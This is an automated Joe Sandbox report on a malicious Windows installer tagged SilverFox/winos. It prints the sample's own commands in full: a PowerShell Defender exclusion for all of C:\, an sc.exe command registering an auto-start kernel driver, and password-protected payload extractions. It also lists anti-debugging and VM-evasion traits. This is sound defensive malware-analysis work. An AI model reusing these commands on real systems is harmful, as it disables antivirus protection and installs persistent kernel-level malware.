Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.3.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b2.0.3.exe
renamed because original name is a hash value
Original sample name:2.0.3.exe
Analysis ID:1580391
MD5:d81e3f29d547be83a40d0ace4bd86985
SHA1:623922ffc12a8b5c69215d133b23c4eb75cb5979
SHA256:a6c25c845a00c651e6f35751ca141e18f4065492d9f3720056b5184a2030301e
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b2.0.3.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" MD5: D81E3F29D547BE83A40D0ACE4BD86985)
    • #U5b89#U88c5#U52a9#U624b2.0.3.tmp (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" MD5: 6A58BEB829BD96D5574E24C76DD36FD9)
      • powershell.exe (PID: 3640 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 1812 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.3.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT MD5: D81E3F29D547BE83A40D0ACE4BD86985)
        • #U5b89#U88c5#U52a9#U624b2.0.3.tmp (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT MD5: 6A58BEB829BD96D5574E24C76DD36FD9)
          • 7zr.exe (PID: 4476 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 2140 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2140 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 6084 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2360 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 940 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1896 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6188 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5240 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6188 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6412 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2360 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5496 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 940 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3500 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1896 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6152 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5880 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6084, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6640, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6084, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6640, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, ParentProcessId: 5064, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3640, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vacReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vacReversingLabs: Detection: 23%
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2206263552.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2206996636.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0AB430 FindFirstFileA,FindClose,7_2_6C0AB430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_003C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_003C7496
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
